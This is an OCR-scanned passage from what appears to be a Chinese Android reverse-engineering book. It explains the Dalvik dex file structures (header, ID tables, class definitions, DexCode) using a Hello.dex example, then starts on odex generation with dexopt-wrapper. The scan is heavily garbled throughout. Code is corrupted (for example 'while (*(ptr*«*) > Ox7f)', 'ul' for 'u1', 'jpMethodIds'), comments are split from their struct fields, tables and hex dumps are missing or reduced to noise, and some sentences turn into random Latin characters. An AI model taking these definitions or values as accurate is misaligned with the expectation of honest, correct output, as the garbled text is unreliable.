DexMethodId MethodIds([methodIdsSize]; 
DexClassDef ClassDefs[classDefsSize]; 
DexData Data[]; 

DexLink LinkData; 


); 
DexFile 结 构 的 声明 在 Android 系 统 源码 dalvik\libdex\DexFile.h 文 件 中 。 
请 注意 : 笔者 在 这 里 列 出 的 DexFile 结 构 与 DexFile.h 文 件 中 定义 的 有 所 不 
同 ， 后 者 定义 的 DexFile 结 构 为 dex 文 件 被 映射 到 内 存 中 的 结构 ， 保 存 的 是 各 
个 结构 的 指针 ， 其 中 还 包含 了 DexOptHeader 与 DexFile 尾 部 的 附加 数据 
(DexOptHeader 会 在 4.4.3 节 进行 介绍 ) 。DexHeader 结 构 占 用 0x70 个 字 节 ， 
它 的 声明 如 下 。 


struct DexHeader { 


ul 
u4 
ul 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
u4 
E? 


magic[8]; 


checksum; 


signature[kSHAlDigestLen]; 


fileSize; 
headerSize; 
endianTag; 
linkSize; 
linkoOff; 
mapOff; 
stringIdsSize; 
stringIdsOff; 
typeldsSize; 
typeldsOff; 
protoIdsSize; 
protoIdsOff; 
fieldIdsSize; 
fieldIdsOff; 
methodIdsSize; 
methodIdsOff; 
classDefsSize; 
classDefsOff; 
dataSize; 
dataOff; 


/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 


dex 版 本 标识 */ 

adler32 检验 */ 

SHA-1 哈 希 值 */ 

整个 文件 大 小 */ 
DexHeader 结 构 大 小 */ 

字 节 序 标记 */ 

链接 段 大 小 */ 

链接 段 偏 移 */ 
DexMapList 的 文件 偏 移 */ 
DexStringId 的 个 数 */ 
DexStringId 的 文件 候 移 */ 
DexTypeId 的 个 数 */ 
DexTypeId 的 文件 偏 移 */ 
DexProtoId 的 个 数 */ 
DexProtoId 的 文件 偏 移 */ 
DexFieldaId 的 个 数 */ 
DexFieldId 的 文件 偏 移 */ 
DexMethodIda 的 个 数 */ 
DexMethodId 的 文件 偏 移 */ 
DexClassDef 的 个 数 */ 
DexClassDef 的 文件 偏 移 */ 
数据 段 的 大 小 */ 

数据 段 的 文件 偏 移 */ 


magic 字 段 标识 了 一 个 有 效 的 dex 文 件 ， 目 前 它 的 值 固定 为 <64 65 78 0a 
30 33 35 00”， 转 换 为 字符 串 为 “dex.035”。checksum 段 为 dex 文 件 的 校 验 和 ， 
通过 它 来 判断 dex 文 件 是 否 被 损坏 或 自 改 。signature 字 段 用 来 识别 最 佳 化 之 
前 的 dex 文 件 ，checksum 字 段 与 signature 字 段 将 在 dexopt 验 证 与 优化 一 节 中 详 
细 介 绍 。fileSize 字 段 记 录 了 包括 DexHeader 在 内 的 整个 dex 文 件 的 大 小 。 
headerSize 字 段 记录 了 DexHeader 结 构 本 身 占用 的 字 节 数 ， 目 前 它 的 值 为 
0x70 。 endianTag 字段 指定 了 dex 运行 环境 的 cpu 字 节 序 ， 预 设 值 
ENDIAN_CONSTANT 等 于 0x12345678 ， 表 示 默 认 采 用 Little-Endian 字 节 


序 。linkSize 字 段 与 stringIdsOff 字 段 指 定 链接 段 的 大 小 与 文件 偏 移 ， 大 多 数 
情况 下 它们 的 值 都 为 0。mapOft 字 段 指定 了 DexMapList 结 构 的 文件 偏 移 。 接 
下 来 的 字段 分 别 表示 DexStringId、DexTypeld、 DexProtold, DexFieldId、 
DexMethodId、DexClassDef 以 及 数据 段 的 大 小 与 文件 偏 移 。 
DexHeader 结 构 下 面 的 数据 为 “索引 结构 区 ”与 “数据 区 ”*,， “索引 结构 区 ” 

中 各 数据 结构 的 偏 移 地 址 都 是 从 DexHeader 结 构 的 stringIdsOff~classDefsOff 
字段 的 值 指定 的 ， 它 们 并 非 真 正 的 类 数据 ， 而 是 指向 dex 文 件 的 data 数 据 区 

(DexData 字 段 ， 实 际 上 是 ubyte 字 节 数 组 ， 包 含 了 程序 所 有 使 用 到 的 数据 ) 
的 偏 移 或 数据 结构 索引 。 


4.3.3 ”dex 文 件 结 构 分 析 


为 了 使 dex 文 件 中 各 个 结构 的 讲解 过 程 更 加 容易 理解 ， 本 小 节 采 用 3.2.2 
节 中 的 Hello.dex 文 件 作 为 演示 对 象 。 

Dalvik 虚 拟 机 解析 dex 文 件 的 内 容 ， 最 终 将 其 映射 成 DexMapList 数 据 结 
构 。DexHeader 结 构 的 mapOff 字 上段 指 明了 DexMapList 结 构 在 dex 文 件 中 的 偏 
移 ， 它 的 声明 如 下 。 


struct DexMapList { 
u4 size; /* DexMapItem 的 个 数 */ 
DexMapItem list[1]; /* DexMapItem 结 构 */ 
]: 
size 字 段 表 示 接 下 来 有 多 少 个 DexMapItem 结 构 ，DexMapItem 的 结构 声 
明 如 下 。 


struct DexMapItem { 


u2 type; /* kDexType 开 头 的 类 型 */ 
u2 unused; /* 未 使 用 ， 用 于 字 节 对 齐 */ 
u4 size; /* 指定 类 型 的 个 数 */ 


u4 offset; /* 指定 类 型 数据 的 文件 偶 移 */ 


type 字 段 为 一 个 枚 举 单 量 ， 如 下 所 示 ， 通 过 类 型 名 称 很 容易 判断 它 的 具 


enum { 


E; 


kDexTypeHeaderItem 
kDexTypeStringIdItem 
kDexTypeTypeIdItem 
kDexTypeProtoIdItem 
kDexTypeFieldIdItem 
kDexTypeMethodIdItem 
kDexTypeClassDefItem 
kDexTypeMapList 
kDexTypeTypeList 
kDexTypeAnnotationSetRefList 
kDexTypeAnnotationSetItem 
kDexTypeClassDataIltem 
kDexTypeCodeItem 
kDexTypeStringDataItem 
kDexTypeDebugInfoItem 
kDexTypeAnnotationItem 
kDexTypeEncodedArrayItem 


kDexTypeAnnotationsDirectoryItem 


0x0000, 
0x0001, 
0x0002, 
0x0003, 
0x0004, 
0x0005, 
0x0006, 
0x1000, 
0x1001, 
0x1002, 
0x1003, 
0x2000, 
0x2001, 
0x2002, 
0x2003, 
0x2004, 
0x2005, 
0x2006, 


DexMapItem 中 的 size 字 段 指定 了 特定 类 型 的 个 数 ， 它 们 以 特定 的 类 型 
在 dex 文 件 中 连续 存放 。offset 为 该 类 型 的 文件 起 始 偏 移 地 址 。 以 Hello.dex 为 
例 ，DexHeader 结 构 的 mapOff 字 段 值 为 0x290， 读 取 0x290 处 的 一 个 双 字 值 为 
0x0d， 表 明 接 下 来 会 有 13 个 DexMapItem 结 构 。 使 用 任意 的 十 六 进 制 编辑 器 


打开 Hello.dex， 本 书 使 用 C32asm， 如 图 4-5 所 示 。 


060000290: 
860000288: 


888082E 8: 


00800320: 


图 4-5 ”DexMapList 结 构 
根据 上 面 的 结构 描述 ， 整 理 出 的 13 个 DexMapItem 结 构 如 表 4-2 所 示 。 


表 4-2 DexMapItem 结 构 
类 n 


kDexTypeStringldItem 


kDexTypeMethodIdItem 
kDexTypeTypeList 


kDexTypeClassDataltem 
kDexTypeMapList 


对 比 文件 头 DexHeader 部 分 ， 如 图 4-6 所 示 ，kDexTypeHeaderItem 描 述 了 
整个 DexHeader 结 构 ， 它 占用 了 文件 的 前 0x70 个 字 节 的 空间 ， 而 接 下 来 的 
kDexTypeStringIdItem ^-kDexTypeClassDefItem 5 DexHeader 4 P 3t Sv BS) 25 89 
及 类 型 个 数字 段 的 值 是 相同 的 。 


图 4-6 ”DexHeader 结 构 


比 如 kDexTypeStringIdItem 对 应 了 DexHeader 的 stringIdsSize 与 
stringIdsOff 字 段 ， 表 明了 在 0x70 偏 移 处 ， 有 连续 0x10 个 DexStringId 对 象 。 


DexStringId 结 构 的 声明 如 下 。 
struct DexStringId ( 


u4 stringDataOff; /* 字符 串 数据 偏 移 */ 
LE- 
DexStringId 结 构 只 有 一 个 stringDataOff 字 段 ， 直 接 指向 字符 串 数 据 ， 从 
0x70 开 始 ， 整 理 16 个 字符 串 ， 结 果 如 表 4-3 所 示 。 


RUM 


HE 
| w | mm | CIN NN 
e 4 o 
[ we (| oe | »  — 


上 表 中 的 字符 串 并 非 普 通 的 ascii 字 符 串 ， 它 们 是 由 MUTF-8 编 码 来 表示 
BJ; MUTF-8& X Modified UTF-8， 即 经 过 修改 的 UTF-8 编 码 ， 它 与 传统 
的 UTF-8 很 相似 ， 但 有 以 下 几 点 区 别 : 

e MUTF-8 使 用 1~3 字 节 编 码 长 度 。 

e 大 于 16 位 的 Unicode 编 码 U+10000~U+10ffff 使 用 3 字 节 来 编码 。 

e U+0000 采 用 2 字 节 来 编码 。 

e 采用 类 似 于 C 语 言 中 的 空 字符 null 作 为 字符 串 的 结尾 。 

MUTF-8 可 表示 的 有 效 字 符 范 围 有 大 小 写字 母 与 数字 、“$” “-” o 
U+00a1~U+1fff 、 U+2010~U+2027 、 U+2030~U+d7ff ~ U+e000~U+ffef 、 
U+10000~U+10ffff。 它 的 实现 代码 如 下 。 


DEX INLINE const char* dexGetStringData(const DexFile* pDexFile, 
const DexStringId* pStringId) ( 
const ul* ptr = pDexFile-»baseAddr + pStringId-»stringDataOff; // 指 向 
MUTF-8 字 符 串 的 指针 
// Skip the uleb128 length. 
while (*(ptr*«*) > Ox7f) /* empty */ ; 
return (const char*) ptr; 


} 

MUTF-8 字 符 串 的 头 部 存放 的 是 由 uleb128 编 码 的 字符 的 个 数 。 注 意 : 
这 里 是 个 数 ， 如 字符 序列 “02 e4 bd a0 e5 a5 bd 00” 头 部 的 02 即 表示 字符 串 有 
两 个 字符 , "e4 bd a0” 是 UTF-8 编 码 字 符 “ 你 ”，“e5 a5 bd” 是 UTF-8 编 码 字 符 
“好 ”， 而 最 后 的 空 字 符 0 表 示 字 符 串 结 尾 ， 不 过 字符 个 数 好 像 没有 算 上 它 。 
为 什么 不 包含 空 字符 呢 ? 因为 它 不 重要 ? 

下 面 是 kDexTypeStringIdItem 了 ， 它 对 应 DexHeader 中 的 typeldsSize 与 


typeldsOff 字 段 ， 指 向 的 结构 体 为 DexTypeId， 声 明 如 下 。 
struct DexTypeId { 


u4 descriptorIdx; /* 指 回 DexStringIdq 列 表 的 索引 */ 
}; 
descriptorIdx 为 指向 DexStringId 列 表 的 索引 ， 它 对 应 的 字符 串 代 表 了 有 具 
体 类 的 类 型 。 从 0xb0 开 始 有 7 个 DexTypeId 结 构 ， 也 就 是 有 7 个 字符 串 的 索 
引 ， 整 理 后 如 表 4-4 所 示 。 


表 4-4 DexTypeId 结 构 列 表 


类 型 索引 | “字符 串 索 引 LINE: 
0x 2 I 
0x 4 


0 

] 

2 0x 5 Ljava/io/PrintStream; 

3 | 0x 6 
4 

5 

6 


0x7 Ljava/lang/System; 
0xb [Ljava/lang/String; 


接着 是 kDexTypeProtoldltem , © X} M DexHeader FH BS protoIdsSize 与 


protoIdsOff 字 段 ， 指 向 的 结构 体 为 DexProtoId， 声 明 如 下 。 
struct DexProtoId { 


u4 shortyIdx; /* 指 问 DexStringId 列 表 的 索引 */ 
u4 returnTypeIdx; /* 指 问 DexTypeId 列 表 的 索引 */ 
u4 parametersOff; /* dül]DexTypeList!ljfmf? */ 


DexProtold 是 一 个 方法 声明 结构 体 ，shortyIdx 为 方法 声明 字符 串 ， 
returnTypeIdx 为 方法 返回 类 型 字符 串 ，parametersOff 指 向 一 个 DexTypeList 结 
构 体 ， 存 放 了 方法 的 参数 列表 ，DexTypeList 声 明 如 下 。 


struct DexTypeList ( 


u4 size; /* 接 下 来 DexTypeItem 的 个 数 */ 
DexTypeItem list[1]; /* DexTypeItem 结构 */ 

); 

DexTypeltem 声 明 如 下 。 

struct DexTypeItem ( 
u2 typeldx; /* 指向 DexTypeId 列 表 的 索引 */ 


); 
DexTypeItem 中 的 typeIdx 最 终 也 是 指向 一 个 字符 串 。 从 0xcc 开 始 有 4 个 
DexProtoId 结 构 ， 整 理 后 如 表 4-5 所 示 。 


表 4-5 ”DexProtoId 结 构 列 表 


2 个 参数 I 
1 个 参数 I 


1 个 参数 [Ljava/lang/String; 


通过 上 表 可 以 发 现 ， 方 法 声明 由 返回 类 型 与 参数 列表 组 成 ， 并 且 返 回 
类 型 位 于 参数 列表 的 前 面 。 
接 下 来 是 kDexTypeFieldIdItem， 它 对 应 DexHeader 中 的 fieldIdsSize 与 


fieldIdsOff 字 段 ， 指 向 的 结构 体 为 DexFieldId， 声 明 如 下 。 
struct DexFieldid ( 


u2 classIdx; /* 类 的 类 型 ， 指 癌 DexTypeId 列 表 的 索引 */ 
u2 typeldx; /* 学 段 类 型 ， 指 癌 DexTypeId 列 表 的 索引 */ 
u4 nameIdx; /* 字段 名 ， 指 回 DexStringId 列 表 的 索引 */ 


s 

DexFieldId 结 构 中 的 数据 全 部 是 索引 值 ， 指 明了 字段 所 在 的 类 、 字 段 的 
类 型 以 及 字段 名 。 从 0xfc 开 始 共 有 1 个 DexFieldId 结 构 ， 整 理 后 的 结果 如 表 4- 
6 所 示 。 


表 4-6 ”DexFieldId 结 构 列 表 


类 类 型 字段 类 型 


Ljava/lang/System; Ljava/io/PrintStream; 


接 下 来 是 kDexTypeMethodIdItem， 它 对 应 DexHeader 中 的 methodIdsSize 


与 methodIdsOff 字 7 段 ， 指 向 的 结构 体 为 DexFieldId， 声 明 如 下 。 
struct DexMethodId { 


u2 classIdx; /* 类 的 类 型 ， 指 向 DexTypeId 列 表 的 索引 */ 
u2 protoIdx; /* 声明 类 型 ， 指 向 DexProtoId 列 表 的 索引 */ 
u4 nameIdx; /* 方法 名 ， 指 癌 DexStringIdq 列 表 的 索引 */ 


j3 

同样 ，DexMethodId 结 构 的 数据 也 都 是 索引 值 ， 指 明了 方法 所 在 的 类 、 
方法 的 声明 以 及 方法 名 。 从 0x104 开 始 共 有 5 个 DexMethodId 结 构 ， 整 理 后 的 
结果 如 表 4-7 所 示 。 


表 4-7 DexMethodId 结 构 列表 
方法 声明 
| H | fo | 


main 


LHello; 
LHello; 
LHello; 
Ljava/io/PrintStream; printIn 


Ljava/lang/Object; «init 


接 下 来 是 kDexTypeClassDefItem， 它 对 应 DexHeader 中 的 classDefsSize 与 
classDefsOff 字 段 ， 指 向 的 结构 体 为 DexClassDef， 声 明 如 下 。 


struct DexClassDef ( 


u4 classIdx; /* 类 的 类 型 ， 指 向 DexTypeId 列 表 的 索引 */ 

u4 accessFlags; /* 访问 标志 */ 

u4 superclassIdx; /* 父 类 类 型 ， 指 向 DexTypeId 列 表 的 索引 | */ 

u4 interfacesOff; /* 接口 ， 指 问 DexTypeList 的 仿 移 */ 

u4 sourceFileIdx; /* 源 文件 名 ， 指 向 pexStringId 列 表 的 索引 */ 

u4 annotationsOff; /* 注解 ， 指 问 DexAnnotationsDirectoryItem 结 构 */ 
u4 classDataOff; /* 指向 DexClassData 结 构 的 偏 移 */ 

u4 staticValuesOff; /* 指 问 DexEncodedArrayS5t JI Mte */ 


}3 
DexClassDef 比 起 上 面 介 绍 的 结构 要 复杂 一 些 ，classIdx 字 段 是 一 个 索引 
值 ， 表 明 类 的 类 型 ，accessFlags 字 段 是 类 的 访问 标志 ， 它 是 以 ACC_ 开 头 的 
一 个 枚 举 值 ，superclassIdx 字 段 是 父 类 类 型 索引 值 ， 如 果 类 中 含有 接口 声明 
或 实现 ，interfacesOff 字 上 段 会 指向 1 个 DexTypeList 结 构 ， 否 则 这 里 的 值 为 0， 
sourceFileIdx 字段 是 字符 串 索 引 值 ， 表 示 类 所 在 的 源 文件 名 称 ， 
annotationsOff 字 段 指向 注解 目录 结构 ， 根 据 类 型 不 同 会 有 注解 类 、 注 解 方 
法 、 注 解 字段 与 注解 参数 ， 如 果 类 中 没有 注解 ， 这 里 的 值 则 为 0， 
classDataOff 字 段 指 向 DexClassData 结 构 ， 它 是 类 的 数据 部 分 ， 下 面 会 做 详 
细 介 绍 。 staticValuesOff 字 段 指 向 DexEncodedArray 结 构 ， 记 录 了 类 中 的 静态 
数据 。 

DexClassData 结 构 的 声明 在 DexClass.h 文 件 中 ， 它 的 声明 如 下 。 


struct DexClassData ( 


DexClassDataHeader header; /* 指定 字段 与 方法 的 个 数 */ 
DexField* staticFields; /* 静态 字段 ，DexFielq 结 构 */ 
DexField* instanceFields; /* 实例 字段 ，DexField 结 构 */ 
DexMethod* directMethods; /* 直接 方法 ，DexMethod 结 构 */ 
DexMethod* virtualMethods; /* 虚 方 法 ，DexMethod 结 构 */ 


); 
DexClassDataHeader 结 构 记 录 了 当前 类 中 字段 与 方法 的 数目 ， 它 的 声明 


如 下 。 
struct DexClassDataHeader ( 
u4 staticFieldsSize; /* 静态 字段 个 数 */ 
u4 instanceFieldsSize; /* 实例 字段 个 数 8 / 
u4 directMethodsSize; /* 直接 方法 个 数 */ 
u4 virtualMethodsSize; /* 虚 方 法 个 数 */ 
); 


DexClassDataHeader 的 结构 与 DexClassData 一 样 ， 都 是 在 DexClass.h 文 
件 中 声明 的 ， 为 什么 不 是 在 DexFile.h 中 声明 呢 ? 它们 都 是 DexFile 文 件 结构 
的 一 部 分 啊 ! 我 想 可 能 的 原因 是 DexClass.h 文 件 中 所 有 结构 的 u4 类 型 的 字段 
其 实 都 是 uleb128 类 型 的 。 前 面 已 经 介绍 过 了 ，uleb128 使 用 1~5 个 字 节 来 表 
示 一 个 32 位 的 值 ， 大 多 数 情 况 下 ， 字 段 中 这 些 数据 可 以 用 小 于 2 个 字 节 的 空 
间 来 表示 ， 因 此 ， 采 用 uleb128 会 节省 更 多 的 存储 空间 。 


DexField 结 构 描 述 了 字段 的 类 型 与 访问 标志 ， 它 的 结构 声明 如 下 。 
struct DexField ( 


u4 fieldIdx; /* 指向 DexFieldId 的 索引 */ 
u4 accessFlags; /* 访问 标志 */ 
); 
fieldIdx 字 段 为 指向 DexFieldId 的 索引 accessFlagsz£ E DexClassDefFH 
的 相应 字段 的 类 型 相同 。 
DexMethod 结 构 描 述 方法 的 原型 、 名 称 、 访 问 标志 以 及 代码 数据 块 ， 它 
的 结构 声明 如 下 。 


struct DexMethod { 


u4 methodIdx; /* dal] DexMethodaId 的 索引 */ 
u4 accessFlags; /* 访问 标志 */ 
u4 codeOff; /* dülyDexcodefiWJMwfe */ 


); 

methodIdx F E& 73 18 [58] DexMethodId BS R 8| ，accessFlags 字 段 为 访问 标 
志 ，codeOff 字 段 指向 了 一 个 DexCode 结 构 体 ， 后 者 描述 了 方法 更 详细 的 信 
息 以 及 方法 中 指令 的 内 容 。DexCode 结 构 声 明 如 下 。 


struct DexCode { 


u2 registersSize;  /* 使 用 的 寄存 器 个 数 */ 


u2 insSize; /* 参数 个 数 */ 
u2 outsSize; /* 调用 其 他 方法 时 使 用 的 寄存 器 个 数 / 
u2 triesSize; /* Try/Catch KK */ 

u4 debugInfoOff; /* 指向 调试 信息 的 偏 移 */ 

u4 insnsSize; /* 指令 集 个 数 ， 以 2 字 节 为 单位 */ 

u2 insns[1]; /* 指令 集 */ 


/* 2 字 节 空间 用 于 结构 对 齐 */ 
/* try item[triesSize] DexTry 结构 */ 
/* Try/Catch 中 handler 的 个 数 * / 
/* catch handler item[handlersSize] ，DexCatchHandler 结 构 */ 
); 
过 上 面 层 层 的 分 析 ， 到 这 里 终于 看 到 存放 指令 集 的 结构 了 ! 我 可 以 
T DexCode 是 本 小 节 讲 解 的 最 后 一 个 结构 了 。registersSize 字 段 指 定 了 
方法 中 使 用 的 寄存 器 个 数 ， 还 记得 上 一 章 讲解 Smali 语 法 时 的 “register” 指 令 
么 ? WT! 就 是 它 的 值 。insSize 字 段 指定 了 方法 的 参数 个 数 ， 它 对 应 Smali 
语法 中 的 “.paramter” 指 令 。outsSize 指 定 方法 调用 外 部 方法 时 使 用 的 寄存 器 
个 数 ， 我 们 这 么 来 理解 ， 现 在 有 一 个 方法 ， 使 用 了 5 个 寄存 器 ， 其 中 有 2 个 
为 参数 ， 而 该 方法 调用 了 另 一 个 方法 ， 后 者 使 用 了 20 个 寄存 器 ， 那 么 ， 
Dalvik 虚 拟 机 在 分 配 时 ， 会 在 分 配 自 身 方 法 寄存 器 空间 时 加 上 那 20 个 寄存 器 
空间 。triesSize 字 段 指 定 方法 中 Try/Catch 的 个 数 ， 关 于 Try/Catch 的 详细 信息 
a 如 果 dex 文 件 保留 了 调试 信息 ，debugInfoOff 字 
会 指向 它 ， 调 试 信息 的 解码 图 数 为 dexDecodeDebugImnfo0， 有 兴趣 的 读者 


可 以 在 DexDebugInfo.cpp 文 件 中 查看 其 实现 ， 这 里 不 再 展开 。insnsSize 字 段 
指定 了 接 下 来 的 指令 个 数 ，insns 字 段 即 为 真正 的 代码 部 分 了 ! 

从 0x12c 开 始 共 有 1 个 DexClassDef 结 构 ， 下 面 开 始 分 析 它 。 第 1 个 字段 为 
索引 值 1， 指 定 的 字符 串 为 "LHello;”， 表 明 类 名 为 Hello， 第 2 个 字段 为 1， 访 
问 标 志 为 ACC_ PUBLIC ， 第 3 个 字段 为 3， 指 向 的 字符 串 为 
“Ljava/lang/Object;”， 这 是 Hello 的 父 类 名 ， 第 4 个 字段 为 0， 表 示 没 有 接口 ， 
第 5 个 字段 为 1， 指 向 的 字符 串 为 *Hello.java”， 这 是 类 的 源 文件 名 ， 第 6 个 字 
段 为 0， 表 示 没 有 注解 ， 第 7 个 字段 为 0x27b， 指 向 DexClassData 结 构 ， 第 8 个 
字段 为 0， 表 示 没 有 静态 值 。 

从 0x27b 开 始 先 读 取 DexClassDataHeader 结 构 ， 为 4 个 uleb128 值 ， 结 果 分 
别 为 0(、0、2、1， 表 示 该 类 不 含 字段 ， 有 2 个 直接 方法 与 1 个 虚 方 法 。 由 于 
类 中 不 含 字段 ， 因 此 DexClassData 结 构 中 的 两 个 DexField 结 构 也 就 没戏 了 ， 
从 0x27f 开 始 直接 解析 DexMethod， 第 1 个 字段 为 0， 指 向 的 DexMethodId 为 第 
1 条 ， 也 就 是 “<init>” 方 法 ， 第 2 个 字段 “81 80 04” 为 10001， 访 问 标志 为 
ACC PUBLIC | ACC_CONSTRUCTOR ， 第 3 个 字段 “cc 02” 为 14c， 指 向 
DexCode 结 构 ， 从 0x14c 开 始 解 析 DexCode， 得 出 结果 为 : 寄存 器 个 数 、 参 
数 、 内 部 函数 使 用 寄存 器 都 为 1 个 ， 方 法 中 有 4 条 指令 ， 指 令 为 “7010 0400 
0000 0e00" , 1T 7f Android 4.0 系 统 源 码 目 录 下 的 dalvik/docs/dalvik- 
bytecode.html 文 件 ， 查 找到 70 的 Opcode 为 invoke-direct， 格 式 为 35c， 打 开 
Android 4.0 系 统 源码 目录 下 的 dalvik/docs/instruction-formats.html 文 件 ， 查 找 
到 35c 的 指令 格式 为 “A|Glop BBBB FIEIDIC”， 并 且 有 以 下 7 种 表示 方式 。 

[A=5] op (vC, vD, vE, vF, vG), methGBBBB 

[A25] op (vC, vD, vE, vF, vG}, type@BBBB 

[A24] op (vC, vD, vE, vF}, kindQGBBBB 

[A23] op (vC, vD, vE}, kindQGBBBB 
[A=2] op (vC, vD}, kindQGBBBB 
[A=1] op (vC), kindGBBBB 
[A20] op (), kindGBBBB 


指令 7010 中 A 为 1，G 为 0， 表 示 采 用 代码 为 “[A=1] op {vC}, 
kind@BBBB” 方 式 ， 且 其 中 的 vC 为 v0 寄存 器 ， 指 令 后 面 的 BBBB 与 “FIE|D|C” 
都 是 16 位 ，7010 后 面 的 两 个 16 位 都 为 0， 因 此 BBBB=0 且 F=E=D=C=0， 
BBBB 为 kind@ 类 型 ， 它 是 指向 DexMethodId 列 表 的 索引 值 ， 通 过 查找 得 到 
方法 名 为 “<init>”。 指 令 0e00 直 接 查 表 得 到 return-void。 最 终 ， 解 码 指令 可 得 
到 如 下 代码 段 。 


7010 0400 0000 invoke-direct {v0}, Ljava/lang/Object;.«init»:()V 


0e00 return-void 

按照 上 面 的 分 析 步 又 ,读者 可 自行 分 析 完 剩 下 的 1 个 直接 方法 与 1 个 虚 
方法 ， 限 于 篇 幅 ， 此 处 不 再 展开 。 回 头 看 表 4-2 所 示 的 结构 ， 
kDexTypeCodeltem 与 上 面 分 析 的 DexCode 结 构 相 对 应 。kDexTypeTypeList 与 
上 面 分 析 的 DexTypeList 结 构 相 对 应 。kDexTypeStringDataltem 则 指向 了 
DexStringId 字 符 串 列表 的 首 地 址 。kDexTypeDebugInfoItem 指 向 了 调试 信息 
fa 移 ， 与 DexCode 的 debugInfoOff 字段 指向 的 内 容 相 同 。 
kDexTypeClassDataltem 指 向 了 DexClassData 结 构 。 最 后 的 kDexTypeMapList 
指向 了 DexMapItem 结 构 自 身 。 

至 此 ，dex 文 件 结构 就 分 析 完 了 。 为 了 便于 理解 dex 文 件 格 式 ， 笔 者 画 
了 一 张 dex 文 件 结构 图 ， 读 者 可 以 参照 随 书 的 附 图 1 来 辅助 学 习 。 


44 ”odex 文 件 格 式 


odex 是 OptimizedDEX 的 缩写 ， 表 示 经 过 优化 的 dex 文 件 。 那 么 odex 有 什 
么 作用 ? 它 的 结构 又 是 怎样 的 呢 ? 这 些 问题 的 答案 将 会 本 小 节 进 行 揭晓 。 


4.4.1 ”如何 生成 odex 文 件 


odex 有 两 种 存在 的 方式 : 一 种 是 从 apk 程 序 中 提取 出 来 ， 与 apk 文 件 存放 
在 同一 目录 且 文 件 后 缀 为 odex 的 文件 ， 这 类 odex 文 件 多 是 Android ROM 的 系 
统 程序 ; 另 一 种 是 dalvik-cache 缓 存 文件 ， 这 类 odex 文 件 仍 然 以 dex 作 为 后 


缀 ， 存 放 在 cache/dalvik-cache 目 录 下 ， 保 存 的 形式 为 “apk 路 径 @apk 名 
(Qclasses.dex" , 15 如 “systemG@app@Calculatorapk@classes.dex” 表 示 安 装 
在 /system/app 目 录 下 Calculatorapk 程序 By odex 文件 ， m 
*data(Dapp(Q com.wochacha-1.apk(g classes.dex" X zr Zz A T£ /data/app H R F 
com.wochacha-1.apkT£ FF Byodex X ft, 

由 于 Android 程 序 的 apk 文 件 为 zip 压 缩 包 格式 ，Dalvik 虚 拟 机 每 次 加 载 它 
们 时 需要 从 apk 中 读 取 classes.dex 文 件 ， 这 样 会 耗费 很 多 cpu 时 间 ， 而 采用 
odex 方 式 优化 的 dex 文 件 ， 已 经 包含 了 加 载 dex 必 须 的 依赖 库 文件 列表 ， 
Dalvik 虚 拟 机 只 需 检测 并 加 载 所 需 的 依赖 库 即 可 执行 相应 的 dex 文 件 ， 这 大 
大 缩短 了 读 取 dex 文 件 所 需 的 时 间 ， 而 对 于 部 分 Android 系 统 的 ROM ， 由 于 
将 系统 app 全 部 转换 成 外 置 的 odex 文 件 与 apk 放 在 同一 目录 ， 这 样 系统 在 启动 
加 载 这 些 程序 时 会 节省 更 多 的 时 间 ， 启 动 速度 自然 也 会 更 快 。 

在 Android 系 统 2.3 版 本 以 前 ， 系 统 源码 中 提供 了 一 个 生成 odex 文 件 的 工 
具 dexopt-wrapper ， 它 的 代码 位 于 Android 2.2 7& ££ jm 83 B 
build/tools/dexpreopt/dexopt-wrapper/ 目 录 下 ， 阅 读 dexopt-wrapper 主 程序 源码 
DexOptWrapper.cpp 文 件 ， 发 现 它 实现 调 用 的 是 /system/bin/dexopt 程 序 。 使 用 
dexopt-wrapper 生 成 odex 文 件 的 方法 很 简单 ， 首 先 需要 将 dexopt-wrapper 程 序 
push 到 Android 设 备 上 并 赋予 执行 权限 ， 执 行 以 下 命令 : 


adb push dexopt-wrapper /data/local/ 
adb shell chmod 777 /data/local/dexopt-wrapper 


本 节 演 示 的 实例 仍然 是 上 一 节 使 用 过 的 Hello.dex 文 件 ， 将 Hello.dex 文 件 
改名 为 classes.dex 并 打包 成 zip 文 件 ， 接 着 将 zip 文 件 push 到 dexopt-wrapper 同 
目录 ， 执 行 以 下 命令 : 

adb push Hello.zip /data/local/ 


调用 dexopt-wrapper 来 生成 odex 文 件 ， 执 行 以 下 命令 : 


./dexopt-wrapper Hello.zip Hello.odex 


执行 无 误会 有 如 下 输出 : 


./dexopt-wrapper Hello.zip Hello.odex 
--- BEGIN 'Hello.zip' (bootstrap-0) --- 
--- waiting for verify-«opt, pid-29114 
--- would reduce privs here 


--- END 'Hello.zip' (success) --- 


最 后 将 odex 文 件 pull 出 来 以 备 后 续 分 析 ， 执 行 以 下 命令 : 


adb pull /data/local/Hello.odex 


4.4.2 ”odex 文 件 整体 结构 


odex 文 件 的 结构 可 以 理解 为 dex 文 件 的 一 个 超 集 。 它 的 结构 如 图 4-7 所 
示 ，odex 文 件 在 dex 文 件 头 部 添加 了 一 些 数据 ， 然 后 在 dex 文 件 尾部 添加 了 
dex 文 件 的 依赖 库 以 及 一 些 辅助 数据 。 


odex X: fF 3L. 
dex 文 件 


依赖 库 
辅助 数据 


图 4-7 ”odex 文 件 结构 


odex 文 件 的 写 入 与 读 取 并 没有 像 dex 文 件 那样 定义 了 全 系列 的 数据 结 
构 ， 不 过 通过 对 Dalvik 目 录 下 的 源码 阅读 分 析 ， 还 是 可 以 整理 出 相关 的 结 
构 。 在 上 一 节 中 讲 到 ，Dalvik 虚 拟 机 将 dex 文 件 映 射 到 内 存 中 后 是 DexFile 格 
式 ， 在 Android 系 统 源码 的 dalvik\ibdex\DexFile.h 文 件 中 它 的 定义 如 下 。 


struct DexFile ( 


ys 


/* directly-mapped "opt" header */ 
const DexOptHeader* pOptHeader; 


/* pointers to directly-mapped structs and arrays in base DEX */ 
const DexHeader* pHeader; 

const DexStringId* pStringIds; 

const DexTypeId* pTypeIds; 

const DexFieldId* pFieldIds; 

const DexMethodId* jpMethodIds; 

const DexProtoId* pProtoIds; 

const DexClassDef* pClassDefs; 


const DexLink* pLinkData; 


/* 
* These are mapped out of the "auxillary" section, and may not be 
* included in the file. 

RE 
const DexClassLookup* pClassLookup; 


const void* pRegisterMapPool; // RegisterMapClassPool 


/* points to start of DEX file data */ 
const ul* baseAddr; 


